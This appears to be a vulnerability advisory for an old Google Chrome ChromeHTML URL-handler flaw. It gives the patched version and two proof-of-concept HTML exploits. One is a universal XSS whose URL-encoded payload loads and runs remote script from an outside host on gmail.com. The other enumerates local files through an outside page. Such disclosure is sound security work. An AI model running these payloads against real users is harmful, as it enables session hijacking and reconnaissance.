Google Chrome
1.0.154.55 and earlier
Apply 1.0.154.59 or later.
A vulnerability in the ChromeHTML URL handler, allows forcing Google Chrome load arbitrary URIs when it is launched through IE. Combined with other issues, this seemingly harmless vulnerability opens the door to two major attack vectors:
It is important to note that the way Internet Explorer processes URL protocol handlers is a known Achilles’ heel and has been widely used previously to attack other various applications.
Universal XSS:
<html>
<title>Google Chrome universal XSS POC</title>
<!--[if IE]>
<p>This PoC will launch Chrome, redirect it to http://www.gmail.com and execute arbitrary JavaScirpt on that domain.</p>
<p>Launching chrome...</p>
<script> document.location = 'chromehtml:"80%20javascript:document.write(unescape(\'%3C%73%63%72%69%70%74%25%32
%30%73%72%63%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67
%2E%77%61%74%63%68%66%69%72%65%2E%63%6F%6D%2F%66
%69%6C%65%73%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72
%69%70%74%3E\'))"';
</script>
<![endif]-->
<p>In order for the POC to work you need Internet Explorer 7 and Google Chrome version < 1.0.154.59.</p>
</html>
File Enumeration:
<title>Google Chrome local files and folders enumeration</title>
<!--[if IE]>
<p>This PoC will launch Chrome with four arbitrary directories and an attacker-controlled web page.<br> The web page is used to enumerate local files and folders using a known history hack</p>
<script>
document.location = 'chromehtml:"80%20c:/exists%20c:/nonexisting%20
c:/windows%20c:/winnt%20http://blog.watchfire.com/files/historyhack.html"';
</script>
<![endif]-->
<p>In order for the POC to work you need Internet Explorer 7 and Google Chrome version < 1.0.154.59.</p>
</html>